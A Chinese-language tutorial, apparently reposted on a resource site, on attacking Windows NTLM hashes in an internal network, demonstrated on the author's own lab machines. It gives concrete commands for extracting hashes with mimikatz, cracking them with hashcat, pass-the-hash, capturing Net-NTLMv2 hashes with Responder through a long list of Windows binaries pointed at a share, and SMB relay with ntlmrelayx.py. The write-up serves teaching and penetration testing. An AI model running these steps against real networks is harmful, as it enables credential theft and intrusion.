内网渗透——针对hash的攻击

2023年11月19日 0 212
本文从hash获取方式,爆破hash,hash中转,中继等方面全面分析,以直观详细的实践来了解攻击过程,过程比较详细,请耐心观看。 0x02 什么是NTLM-hash、net NTLM-hash NTLM hash是windows登录密码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中获得所有用户的hash(比如用Mimikatz提取),获取该hash之后,可进行爆破明文、哈希传递(PtH攻击), Net-NTLM的hash是基于NTLM的hash值经过一定的算法产生的,获取Net-NTLM的hash之后,可进行爆破明文、利用smb进行中继攻击,该hash不能进行哈希传递攻击。什么是NTLM hash? NTLM hash的生成方法: 1、将明文口令转换成十六进制的格式 2、把十六进制转换成Unicode格式,每个字节之后添加0x00 3、再对Unicode字符串作MD4加密,生成32位的十六进制数字串 这里我通过mimikatz工具先直观的了解NTLM hash,mimikatz直接从 lsass.exe 里获取windows处于active状态账号明文密码,以windows server2012为例: 从上图发现: NTLM hash:A1E33A2281B8C6DBC2373BFF87E8CB6E 明文密码:123456Abc 0x03 对NTLM hash暴力破解 如果通过其它途径获得此hash,即A1E33A2281B8C6DBC2373BFF87E8CB6E,可用hashcat进行字典暴力破解,Hashcat参数如下: hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force 参数说明:-m 选择哈希类别,1000为NTLM-o 输出破解成功的明文example.dict 明文字典 打开out.txt,发现明文123456Abc 注意: 由于windows server2012 r2、windwos 8.1以及更高版本都做了加固,即禁止明文缓存到内存,而mimikatz是基于内存获取明文密码,则无法直接通过mimikatz获取明文密码,直接提取结果为“null”,但可通过修改注册表来获取。 0x04 NTLM哈希传递 哈希传递通俗来讲,就是不需要明文登录,用NTLM hash可直接进行登录。 在我们使用某服务时,Windows会带上自身的认证信息进行尝试登录,这个认证信息其实就是Net-NTLM的Hash,我们使用哪些服务会让Windows带上自身认证信息登录?如访问smb共享文件夹等,此时会使用认证信息尝试登录,并且调用lsass内存中的hash缓存尝试登录,此时使用mimikatz等工具修改缓存的hash为获取得到的hash,从而使用修改的hash进行登录,这是哈希传递的原理。文章后面讲到的获取Net-NTLM的hash,其实就是利用带认证信息访问smb,如让管理员访问此wdb:,192.168.191.129被攻击者控制的一台内网PC,可获取管理员的Net-NTLM hash。 先讲下认证请求过程: 1、客户端先对在本地对密码加密成为密码散列2、客户端发送认证请求,即发生明文账号3、服务器返回一个16位的随机数字发送给客户端,作为一个 challenge4、客户端再用步骤1的密码散列来加密这个 challenge ,作为 response返回给服务器。5、服务器把用户名、给客户端的challenge 、客户端返回的 response ,发送域控制器6、域控制器使用此用户名在SAM密码管理库的密码散列,加密给客户端的challenge7、与步骤4客户端加密的challenge比较,如果两个challenge一致,认证成功 哈希传递漏洞发生在步骤4中,直接使用修改缓存后的hash,进行challenge加密,对challenge 加密的hash已经不是发送账号对应的hash,而是攻击者通过其他途径获取的hash进行challenge加密。Pth攻击演示: 靶机ip: 攻击机ip: 假设已经获得NTLM hash: 管理员身份运行mimikatz: mimikatz执行命令参数: sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E33A2281B8C6DBC2373BFF87E8CB6E 此时再进行其它认证操作,可直接用获取的目标hash进行登录认证。 0x05 Net-NTLM hash获取 Net-NTLM hash不能直接获取,通过Responder工具进行拦截获取,此hash不能进行哈希传递,但可进行中继转发,利用Responder等中间人工具,结合其它工具可自动化进行拦截获取并中继转发,其它工具如 Impacket的ntlmrelayx.py进行中继转发。 在攻击机上运行Responder,此时攻击机模拟为SMB服务让受害者进行认证登录,通过设置几个模拟的恶意守护进程(如SQL服务器,FTP,HTTP和SMB服务器等)来直接提示凭据或模拟质询 – 响应验证过程并捕获客户端发送的必要 hash,当受害者机器尝试登陆攻击者机器,responder就可以获取受害者机器用户的NTLMv2哈希值。。 Responder下载安装: https://github.com/lgandx/Responder Responder操作演示 客户端IP: 攻击机IP: 1、 无需编辑Responder.conf,因为此时SMB、HTTP服务不要关闭,等中继攻击时才关闭这两个服务。因此这里先演示Responder怎么获取net-NTLM hash,在中继攻击里关闭SMB、HTTP,是因为此时不再由Responder获取hash,而是直接让ntlmrelayx.py来完成这一任务。 2、 攻击机执行 python Responder.py -I eth0,此时处于监听状态 3、 利用SMB协议,客户端在连接服务端时,默认先使用本机的用户名和密码hash尝试登录,所以可以模拟SMB服务器从而截获hash,执行如下命令都可以得到hash。客户端执行如下命令,攻击机的Responder能收到。 > net.exe use \hostshare > attrib.exe \hostshare > bcdboot.exe \hostshare > bdeunlock.exe \hostshare > cacls.exe \hostshare > certreq.exe \hostshare #(noisy, pops an error dialog) > certutil.exe \hostshare > cipher.exe \hostshare > ClipUp.exe -l \hostshare > cmdl32.exe \hostshare > cmstp.exe /s \hostshare > colorcpl.exe \hostshare #(noisy, pops an error dialog) > comp.exe /N=0 \hostshare \hostshare > compact.exe \hostshare > control.exe \hostshare > convertvhd.exe -source \hostshare -destination \hostshare > Defrag.exe \hostshare > diskperf.exe \hostshare > dispdiag.exe -out \hostshare > doskey.exe /MACROFILE=\hostshare > esentutl.exe /k \hostshare > expand.exe \hostshare > extrac32.exe \hostshare > FileHistory.exe \hostshare #(noisy, pops a gui) > findstr.exe * \hostshare > fontview.exe \hostshare #(noisy, pops an error dialog) > fvenotify.exe \hostshare #(noisy, pops an access denied error) > FXSCOVER.exe \hostshare #(noisy, pops GUI) > hwrcomp.exe -check \hostshare > hwrreg.exe \hostshare > icacls.exe \hostshare > licensingdiag.exe -cab \hostshare > lodctr.exe \hostshare > lpksetup.exe /p \hostshare /s > makecab.exe \hostshare > msiexec.exe /update \hostshare /quiet > msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog) > mspaint.exe \hostshare #(noisy, invalid path to png error) > msra.exe /openfile \hostshare #(noisy, error) > mstsc.exe \hostshare #(noisy, error) > netcfg.exe -l \hostshare -c p -i foo 客户端执行 net use 192.168.191.131aaa 4、 攻击机成功收到NTLMv2-SSP Hash Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 爆破net-NTLM hash 继续用hashcat进行hash爆破,Hashcat参数如下: hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 example.dict -o out.txt --force 参数说明: -m 选择哈希类别,5600为net-NTLM 成功破解出明文密码,如下图: 打开out.txt,发现破解出明文123456Abc 0x06 SMB中继攻击 前面文章说过了,当获取到net-NTLM hash之后,由于不能通过类似哈希传递的修改缓存hash进行认证,此hash无法进行哈希传递,怎么进行攻击呢?可通过Responder工具拦截管理员的net-NTLM hash,配合ntlmrelayx.py进行中继转发。 Impacket下载: git clone https://github.com/CoreSecurity/impacket.git 进行中继前提:目标SMB签名需要关闭,在SMB连接中,需要使用安全机制来保护服务器和客户端之间传输数据的完整性,而这种安全机制就是SMB签名和加密,如果关闭SMB签名,会允许攻击者拦截认证过程,并且将获得hash在其他机器上进行重放,,从而获得域管权限。 目前SMB常用来做为SMB文件共享、打印机,如果签名关闭,可能导致文件共享、打印机被入侵。 比如我用虚拟机搭建的SMB文件共享如下,具体认证登录过程文章前面部分已讲过,看看这个效果: 虚拟机IP:192.168.191.139 先探测目标是否已关闭SMB签名,命令如下: nmap --script smb-security-mode.nse -p445 192.168.191.139 --open 如下是我用虚拟机搭建的域控环境测试,中继转发操作: 域内普通用户-受害者机器(win7) 域管理员(administrator)机器(windows server 2012 r2) kali linux 攻击者机器 1、Responder关闭SMB、HTTP 2、执行python Responder.py -I eth0 -r -d –w 3、执行python ntlmrelayx.py -tf targets.txt -socks -smb2support 说明 : targets.txt内容为域内受害IP 192.168.191.139 python ntlmrelayx.py -t 192.168.191.139 -socks -smb2support // 4、域管模拟输入一个共享,生成一个LLMNR请求 5、通过Responder发送 6、NTLMv2哈希凭据被中继 攻击流程总结: 1、关闭Responder的SMB和HTTP服务, 运行Responder工具来截取Net-NTLM哈希值 2、运行ntlmrelayx.py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的SMB和HTTP服务 3、ntlmrelayx.py将hash发送到目标列表中,如果中继操作执行成功会触发通知命令。 这里先大概熟悉下中继转发的原理基础,在下一篇会结合DeathStar和Empire,演示自动化域渗透,以及对net NTLM-hash的利用。

所有文章为演示数据,不提供下载地址,版权归原作者所有,仅提供演示效果!

资源淘 网络安全 内网渗透——针对hash的攻击 https://www.ziyuantao.com/wenzhang/detail/7676

我们只做高端Wordpress主题开发!

相关文章

猜你喜欢
发表评论
暂无评论
全部评论